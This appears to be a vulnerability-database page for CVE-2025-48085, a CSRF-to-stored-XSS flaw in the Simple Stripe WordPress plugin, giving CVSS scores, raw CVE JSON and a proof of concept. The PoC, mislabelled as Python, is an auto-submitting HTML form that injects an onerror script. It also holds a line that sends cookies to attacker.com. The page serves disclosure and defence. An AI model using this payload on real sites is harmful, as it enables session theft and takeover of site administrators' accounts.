Security Vulnerability Report
中文
CVE-2025-48085 CVSS 7.1 HIGH

CVE-2025-48085

Published: 2025-11-06 16:15:52
Last Modified: 2026-04-27 20:16:07

Description

Cross-Site Request Forgery (CSRF) vulnerability in ZIPANG Simple Stripe simple-stripe allows Stored XSS.This issue affects Simple Stripe: from n/a through <= 0.9.17.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

simple-stripe <= 0.9.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-48085 - Simple Stripe CSRF to Stored XSS --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-48085</title> </head> <body> <h1>Simple Stripe CSRF to Stored XSS PoC</h1> <p>This PoC demonstrates the CSRF vulnerability that leads to Stored XSS.</p> <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="exploitForm"> <input type="hidden" name="action" value="simple_stripe_save_settings"> <input type="hidden" name="stripe_publishable_key" value="pk_test_xss_payload"> <input type="hidden" name="stripe_secret_key" value="sk_test_injection"> <input type="hidden" name="button_text" value="Pay Now<img src=x onerror=alert('XSS by CSRF')>"> <input type="hidden" name="simple_stripe_nonce" value=""> </form> <script> // Auto-submit the form to exploit CSRF vulnerability document.getElementById('exploitForm').submit(); // Alternative: Steal cookies var stealCookiePayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">'; console.log('XSS Payload: ' + stealCookiePayload); </script> <p>If exploitation is successful, the malicious JavaScript will be stored and executed on the Simple Stripe settings page.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48085", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:51.970", "lastModified": "2026-04-27T20:16:06.617", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in ZIPANG Simple Stripe simple-stripe allows Stored XSS.This issue affects Simple Stripe: from n/a through <= 0.9.17."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/simple-stripe/vulnerability/wordpress-simple-stripe-plugin-0-9-17-cross-site-request-forgery-csrf-to-stored-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}